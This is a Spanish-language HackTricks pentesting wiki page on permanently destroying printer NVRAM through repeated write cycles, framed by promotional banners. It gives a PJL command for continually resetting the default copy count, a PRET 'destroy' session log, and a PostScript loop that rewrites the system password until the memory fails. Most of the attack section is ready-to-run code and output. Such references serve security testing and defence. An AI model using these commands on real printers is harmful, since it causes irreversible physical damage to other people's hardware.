☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 - ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)! - Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) - Consigue la [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com) - **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** - **Comparte tus trucos de hacking enviando PRs al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
La configuración a largo plazo de las impresoras y otros dispositivos integrados se almacena en la memoria no volátil ([NVRAM](https://en.wikipedia.org/wiki/Non-volatile\_random-access\_memory)), que se implementa tradicionalmente como [EEPROM](https://en.wikipedia.org/wiki/EEPROM) o como memoria [flash](https://en.wikipedia.org/wiki/Flash\_memory). Ambos componentes tienen una vida útil limitada. Hoy en día, los proveedores de memoria flash garantizan alrededor de 100,000 reescrituras antes de que puedan ocurrir errores de escritura. ## PJL Para una prueba práctica de destrucción de la funcionalidad de escritura de NVRAM, se puede establecer continuamente el valor a largo plazo para el número de copias con diferentes valores para `X`: ``` @PJL DEFAULT COPIES=X ``` Normalmente, antes de dejar de permitir la escritura, todos los parámetros NVRAM se fijan en el valor predeterminado de fábrica y todas las variables aún pueden ser cambiadas para el trabajo de impresión actual utilizando el comando `@PJL SET...`. Usando [PRET](https://github.com/RUB-NDS/PRET): ``` ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> destroy Warning: This command tries to cause physical damage to the printer NVRAM. Use at your own risk. Press CTRL+C to abort. Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM! Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave? [... wait for about 24 hours ...] I'm afraid. I'm afraid, Dave. Dave, my mind is going... NVRAM died after 543894 cycles, 18:46:11 ``` ## PostScript En el caso de PostScript, es necesario encontrar una entrada en el diccionario currentsystemparams que sobreviva a un reinicio (y por lo tanto debe estar almacenada en algún tipo de NVRAM). Un buen candidato sería una contraseña de PostScript.\ PostScript puede ejecutar un script que corrompe su propia NVRAM: ``` /counter 0 def { << /Password counter 16 string cvs /SystemParamsPassword counter 1 add 16 string cvs >> setsystemparams /counter counter 1 add def } loop ``` **Más información sobre estas técnicas se puede encontrar en** [**http://hacking-printers.net/wiki/index.php/Physical\_damage**](http://hacking-printers.net/wiki/index.php/Physical\_damage)
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 - ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)! - Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) - Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com) - **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme en** **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** - **Comparte tus trucos de hacking enviando PR al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.